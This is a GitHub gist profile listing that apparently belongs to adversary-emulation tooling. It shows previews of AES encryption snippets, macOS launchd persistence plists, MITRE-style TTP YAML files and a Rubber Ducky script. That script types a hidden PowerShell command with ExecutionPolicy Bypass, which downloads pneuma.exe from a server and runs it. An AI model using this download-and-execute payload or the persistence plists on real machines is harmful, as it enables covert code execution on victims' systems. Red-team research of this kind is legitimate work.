Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
Do you know 418?

david privateducky

💭
Do you know 418?
View GitHub Profile
@privateducky
privateducky / aes.go
Created Jun 7, 2022 — forked from willshiao/aes.go
AES 256-CFB in Node.js, Go, and Python
View aes.go
package main
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"crypto/sha256"
"encoding/base64"
"fmt"
"io"
View pneuma-plist.sh
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "<http://www.apple.com/DTDs/PropertyList-1.0.dtd>">
<plist version="1.0">
<dict>
<key>Label</key>
<string>my.pneuma</string>
<key>ProgramArguments</key>
<array>
<string>${agent.location}</string>
</array>
View securitystate.sh
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "<http://www.apple.com/DTDs/PropertyList-1.0.dtd>">
<plist version="1.0">
<dict>
<key>Label</key>
<string>my.boomer</string>
<key>ProgramArguments</key>
<array>
<string>/usr/local/bin/python3</string>
<string>/Users/privateducky/Downloads/boomer.py</string>
@privateducky
privateducky / duckpneuma
Created Feb 7, 2021
Rubber ducky example
View duckpneuma
DEFAULT_DELAY 150
DELAY 300
GUI r
DELAY 100
STRING powershell
ENTER
DELAY 300
STRING powershell.exe -W Hidden -ExecutionPolicy Bypass {$server="http://127.0.0.1:3391"; $url="$server/file"; $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); $wc.Headers.add("server", $server); $wc.Headers.add("file","pneuma.exe"); ($data=$wc.DownloadData($url)) -and ($name=$wc.ResponseHeaders["Content-Disposition"].Substring($wc.ResponseHeaders["Content-Disposition"].IndexOf("filename=")+9).Replace("`"","")) -and ([io.file]::WriteAllBytes("C:\Users\Public\$name.exe",$data)) | Out-Null; iex "C:\Users\Public\$name.exe";}
ENTER
DELAY 1500
View gist:20028b269e28fc46b13f73895cb71d70
import argparse
import json
import os
import requests
from datetime import datetime
class Installer:
def __init__(self):
View ttp2.yml
id: 300157e5-f4ad-4569-b533-9d1fa0e74d74
metadata:
version: 1
authors:
- privateducky
- MITRE
tags:
- Crown Jewels
name: Compress staged directory
description: |
View ttp1.yml
id: 6469befa-748a-4b9c-a96d-f191fde47d89
metadata:
version: 2
authors:
- privateducky
- MITRE
tags:
- Crown Jewels
name: Create new directory
description: |
View base64.go
func Encrypt(bites []byte) []byte {
return []byte(b64.StdEncoding.EncodeToString(bites))
}
func Decrypt(text string) string {
beacon, _ := b64.StdEncoding.DecodeString(text)
return beacon
}
View golang-encryption.go
//Encrypt the results
func Encrypt(bites []byte) []byte {
plainText, err := pad(bites, aes.BlockSize)
if err != nil {
log.Print(err)
return make([]byte, 0)
}
block, _ := aes.NewCipher(encryptionKey)
cipherText := make([]byte, aes.BlockSize+len(plainText))
iv := cipherText[:aes.BlockSize]
View encrypt1.js
const iv = crypto.randomBytes(BLOCK_SIZE)
const cipher = crypto.createCipheriv(ALGORITHM, key, iv)
let cipherText
try {
cipherText = cipher.update(text, 'utf8', 'hex')
cipherText += cipher.final('hex')
cipherText = iv.toString('hex') + cipherText
} catch (e) {
cipherText = null
}